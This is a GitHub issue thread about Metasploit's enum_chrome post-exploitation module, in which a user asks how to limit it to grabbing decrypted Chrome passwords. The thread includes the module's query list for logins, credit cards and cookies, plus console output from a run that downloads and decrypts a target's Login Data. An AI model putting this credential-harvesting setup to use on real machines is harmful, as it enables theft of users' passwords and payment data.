### ISSUE TITLE
Edit enum_chrome (/modules/post/windows/gather/enum_chrome.rb) to work faster .....

### ISSUE THREAD

**Issue by user2618** [rapid7/metasploit-framework#10056]
Please help to edit this module (enum_chrome.rb) to work faster and just download the decrypted data file of browsers ...i want to download just  decrypted data file , because usually the other files ( such cokie and history file .. is too large ) plz help

**Comment by bcoles** [comment]
You'll probably want to comment out some of these entries:

```ruby
    @chrome_files = [
      { :raw => "", :in_file => "Web Data", :sql => "select * from autofill;"},
      { :raw => "", :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;"},
      { :raw => "", :in_file => "Web Data", :sql => "select * from autofill_profiles;"},
      { :raw => "", :in_file => "Web Data", :sql => "select * from credit_cards;", :encrypted_fields => ["card_number_encrypted"]},
      { :raw => "", :in_file => "Cookies", :sql => "select * from cookies;"},
      { :raw => "", :in_file => "History", :sql => "select * from urls;"},
      { :raw => "", :in_file => "History", :sql => "SELECT url FROM downloads;"},
      { :raw => "", :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;"},
      { :raw => "", :in_file => "Login Data", :sql => "select * from logins;", :encrypted_fields => ["password_value"]},
      { :raw => "", :in_file => "Bookmarks", :sql => nil},
      { :raw => "", :in_file => "Preferences", :sql => nil},
    ]
```

**Comment by user2618** [comment]
**All i can do is this :**
  def run
    @chrome_files = [
#     { :raw => "", :in_file => "Web Data", :sql => "select * from autofill;"},
#      { :raw => "", :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;"},
#      { :raw => "", :in_file => "Web Data", :sql => "select * from autofill_profiles;"},
#      { :raw => "", :in_file => "Web Data", :sql => "select * from credit_cards;", :encrypted_fields => ["card_number_encrypted"]},
#      { :raw => "", :in_file => "Cookies", :sql => "select * from cookies;"},
      { :raw => "", :in_file => "History", :sql => "select * from urls;"},
#      { :raw => "", :in_file => "History", :sql => "SELECT url FROM downloads;"},
#     { :raw => "", :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;"},
      { :raw => "", :in_file => "Login Data", :sql => "select * from logins;", :encrypted_fields => ["password_value"]},
      { :raw => "", :in_file => "Bookmarks", :sql => nil},
#     { :raw => "", :in_file => "Preferences", :sql => nil},
    ]
**and result :** 

msf post(windows/gather/enum_chrome) > run

[*] Impersonating token: 4884
[*] Running as user 'user1\user'...
[*] Extracting data for user 'user'...
[+] Downloaded History to '/root/.msf4/loot/20180518075712_default_192.168.1.5_chrome.raw.Histo_526258.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20180518075724_default_192.168.1.5_chrome.raw.Login_809532.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20180518075725_default_192.168.1.5_chrome.raw.Bookm_977637.txt'
[+] Decrypted data saved in: /root/.msf4/loot/20180518075836_default_192.168.1.5_chrome.decrypted_540635.txt
[*] Post module execution completed

still download unnessesary files and when i trying to disable the rest lines for example line 6  **({ :raw => "", :in_file => "History", :sql => "select * from urls;"}, )**    i visit this result : 

[*] Impersonating token: 4884
[*] Running as user 'user1\user'...
[*] Extracting data for user 'user'...
[+] Downloaded Login Data to '/root/.msf4/loot/20180518080326_default_192.168.1.5_chrome.raw.Login_631289.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20180518080327_default_192.168.1.5_chrome.raw.Bookm_633900.txt'
[-] Post failed: Encoding::InvalidByteSequenceError "p\xD8" followed by "\xE1\v" on UTF-16LE
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_helper.rb:63:in `encode'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_helper.rb:63:in `uniz_to_str'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:334:in `block in process_function_call'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:322:in `each_pair'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:322:in `process_function_call'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb:86:in `call_function'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/railgun/library_wrapper.rb:25:in `method_missing'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:111:in `decrypt_data'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:159:in `block (3 levels) in process_files'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:156:in `each'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:156:in `block (2 levels) in process_files'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:152:in `map!'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:152:in `block in process_files'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:136:in `each'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:136:in `process_files'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:327:in `block in run'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:324:in `each'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:324:in `run'
[*] Post module execution completed


I can't go further

**Comment by ccondon-r7** [comment]
Hi there! We're closing this issue because it hasn't been active in a while. If you'd like to re-confirm and re-open it, feel free to do so. Thanks!
